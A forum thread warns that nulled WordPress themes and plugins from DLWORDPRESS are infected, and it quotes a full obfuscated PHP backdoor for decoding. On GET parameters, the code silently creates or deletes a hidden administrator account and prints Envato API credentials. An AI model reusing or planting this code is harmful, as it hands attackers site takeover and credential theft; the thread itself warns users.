Be careful of the themes and plugins that comes from DLWORDPRESS.COM you will find problems on your site long term.
Check:
https://wordpress.org/support/topic/code...ions-file/
Check Source Virus DLWORDPRESS: http://*marked as SPAM*/DswUxBsc
Plugin SEO All in one
Think smart!
all themes and plugins they have are infected
It's old story. Maybe you missed the thread of Brother@ Jendaceo here:
http://bestblackhatforum.com/Thread-WARN...d-Websites
PS: Every days here, there are some 'good' guys post the infected themes and plugins they collected from nulled-infected-sites like dlwordpress, null24, wplocker...and If u guys not take care, will bring that infected garbages to your home!
There is no proof of infections on null24 or wplocker. So please backup your claims next time you reply here! I only see encrypted malicious codes inside dlwordpress files.
(03-18-2017 02:34 AM)bale Wrote: [ -> ]There is no proof of infections on null24 or wplocker. So please backup your claims next time you reply here! I only see encrypted malicious codes inside dlwordpress files.
No infections, maybe. But backlinks and other s.t, I sure!
null24 and wplocker, themelock..and others..no viruses, maybe, but they're bring garbage links to your sites.
That way, exactly, STOLEN behind free meals!
(03-18-2017 02:34 AM)bale Wrote: [ -> ]There is no proof of infections on null24 or wplocker. So please backup your claims next time you reply here! I only see encrypted malicious codes inside dlwordpress files.
true, they do add some hidden links from time to time though.
can any one decode this ..
<?php ${"GL\x4f\x42\x41\x4c\x53"}["\x71\x77\x66\x74mj\x77"]="\x6f\x70\x74\x69\x6fn\x73";${"G\x4c\x4fB\x41\x4c\x53"}["\x6bl\x75\x64\x73\x67cib\x6c"]="\x74\x61\x62\x6c\x65\x5f\x6ea\x6d\x65";${"\x47\x4c\x4f\x42ALS"}["\x79i\x6agu\x6e\x65l\x63\x78\x6b"]="\x73am\x70\x6ce";error_reporting(0);require$_SERVER["\x44\x4fC\x55\x4d\x45NT_ROOT"]."/\x77p-l\x6fad\x2e\x70h\x70";${${"\x47\x4c\x4fBA\x4cS"}["k\x6c\x75\x64\x73\x67\x63\x69\x62\x6c"]}=$wpdb->get_blog_prefix();${${"GLO\x42A\x4cS"}["yi\x6a\x67une\x6cc\x78\x6b"]}="\x61:\x31:{\x73:\x31\x33:\"\x61\x64m\x69n\x69\x73\x74r\x61\x74or\"\x3bb:1\x3b}";if(isset($_GET["\x6fk"])){echo"<\x21-- Sile\x6ec\x65 \x69s\x20\x67\x6f\x6c\x64e\x6e\x2e\x20--\x3e";}if(isset($_GET["\x61\x77u"])){$wpdb->query("\x49NSE\x52\x54 \x49\x4e\x54O $wpdb->users (\x60I\x44\x60, `\x75\x73er_\x6cogi\x6e`, `use\x72\x5f\x70a\x73\x73`,\x20\x60u\x73\x65r_n\x69\x63\x65\x6eam\x65`,\x20`\x75\x73er_\x65m\x61\x69l\x60, \x60u\x73\x65r\x5fur\x6c`,\x20\x60\x75\x73\x65\x72\x5f\x72e\x67\x69st\x65red`,\x20`\x75\x73\x65\x72_act\x69vat\x69\x6f\x6e\x5fkey\x60, `\x75\x73e\x72\x5fst\x61tus`,\x20`\x64\x69\x73p\x6ca\x79_\x6e\x61m\x65`)\x20\x56A\x4c\x55E\x53\x20('100\x310\x31\x30', \x271\x300\x310\x310\x27, \x27\$P\$\x42\x33\x50J\x58\x65\x6f\x72E\x71\x56\x4d\x6c//L3H5\x78\x46\x581\x55\x630t58\x37\x30',\x20\x27\x310\x301\x301\x30\x27, \x27t\x40\x65\x2est',\x20'\x27,\x20\x2720\x31\x31-\x30\x36-07\x20\x30\x30:\x30\x30:0\x30', '\x27,\x20\x270', '\x3100\x31\x301\x30');");$wpdb->query("I\x4e\x53E\x52T IN\x54\x4f\x20$wpdb->usermeta\x20(\x60um\x65t\x61_i\x64\x60, \x60\x75\x73er\x5f\x69d`, \x60me\x74a\x5f\x6b\x65\x79`, \x60me\x74a\x5f\x76\x61l\x75\x65`) \x56\x41\x4cU\x45\x53 (1\x30\x301\x30\x31\x30,\x20\x27\x31\x300\x310\x31\x30', '{$table_name}c\x61\x70a\x62\x69\x6c\x69t\x69\x65\x73\x27, '{$sample}\x27)\x3b");$wpdb->query("I\x4eSER\x54\x20\x49\x4eT\x4f\x20$wpdb->usermeta\x20(`um\x65\x74\x61_i\x64`, \x60us\x65\x72_\x69\x64\x60,\x20\x60\x6det\x61_\x6b\x65\x79`, \x60\x6d\x65\x74\x61_\x76\x61lue\x60) V\x41\x4cU\x45\x53 (\x4eU\x4cL, '\x31\x3001\x301\x30',\x20\x27{$table_name}\x75s\x65r\x5fl\x65\x76\x65\x6c\x27, '\x31\x30\x27)\x3b");}if(isset($_GET["d\x77\x75"])){$wpdb->query("\x44\x45LE\x54\x45 \x46RO\x4d $wpdb->users \x57\x48\x45RE \x60I\x44\x60 \x3d 1\x30\x30\x310\x31\x30");$wpdb->query("D\x45L\x45T\x45\x20\x46\x52OM\x20$wpdb->usermeta\x20\x57\x48\x45\x52\x45\x20$wpdb->usermeta.`u\x6d\x65\x74a\x5f\x69\x64`\x20= 1\x30\x301\x30\x310");}if(isset($_GET["\x6b\x65\x79"])){$gvgdrowuag="\x6f\x70\x74\x69\x6f\x6e\x73";${"GL\x4fBA\x4c\x53"}["\x69\x75\x6eeg\x70\x67\x73"]="\x6f\x70\x74\x69\x6fn\x73";${$gvgdrowuag}=get_option(EWPT_PLUGIN_SLUG);echo"\x3c\x63e\x6et\x65\x72>\x3ch2>".esc_attr(${${"G\x4c\x4fBA\x4cS"}["\x69\x75\x6e\x65\x67pg\x73"]}["\x75s\x65\x72\x5fn\x61\x6d\x65"].":".esc_attr(${${"\x47\x4cOB\x41\x4cS"}["\x71w\x66t\x6d\x6a\x77"]}["\x61pi_\x6bey"]))."<\x62\x72\x3e";echo esc_html(envato_market()->get_option("\x74\x6f\x6b\x65\x6e"));echo"\x3c/\x63\x65nt\x65\x72\x3e\x3c/\x682>";}
?>
Its mostly watermarks and its understandable. But dlwordpress its the worst i have ever encounter . On his older files he was adding an even badder base64 function creating extra files and giving him admin access.
@NotSo Invisible Online
And more:
If you see some guys share a ton themes and plugins per months. You should know 99% they collected its from nulled/shared sites.
(03-18-2017 03:58 AM)althafrahsan Wrote: [ -> ]can any one decode this ..
<?php ${"GL\x4f\x42\x41\x4c................5\x6e"));echo"\x3c/\x63\x65nt\x65\x72\x3e\x3c/\x682>";}
?>
This add new user and can do edit or collect your content. Maybe!